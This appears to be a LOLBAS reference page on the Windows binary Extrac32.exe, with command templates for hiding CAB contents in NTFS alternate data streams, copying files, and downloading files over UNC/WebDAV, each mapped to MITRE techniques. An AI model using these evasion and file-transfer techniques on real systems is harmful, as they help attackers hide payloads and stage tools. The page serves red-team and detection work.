🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸͺŸ LOLBAS / Extrac32.exe

Extrac32.exe

Extract to ADS, copy or overwrite a file with Extrac32.exe

ADS

Extract data from cab file and hide it in an alternate data stream.

extrac32 {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE}:file.exe

Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file. — MITRE: T1564.004 — Privileges: User

Extract data from cab file and hide it in an alternate data stream.

extrac32 {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE}:file.exe

Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file. — MITRE: T1564.004 — Privileges: User

Copy

Copy file

extrac32.exe /C {PATH_ABSOLUTE:.source.exe} {PATH_ABSOLUTE:.dest.exe}

Command for copying file from one folder to another — MITRE: T1105 — Privileges: User

Download

Download file from UNC/WEBDav

extrac32 /Y /C {PATH_SMB} {PATH_ABSOLUTE}

Copy the source file to the destination file and overwrite it. — MITRE: T1105 — Privileges: User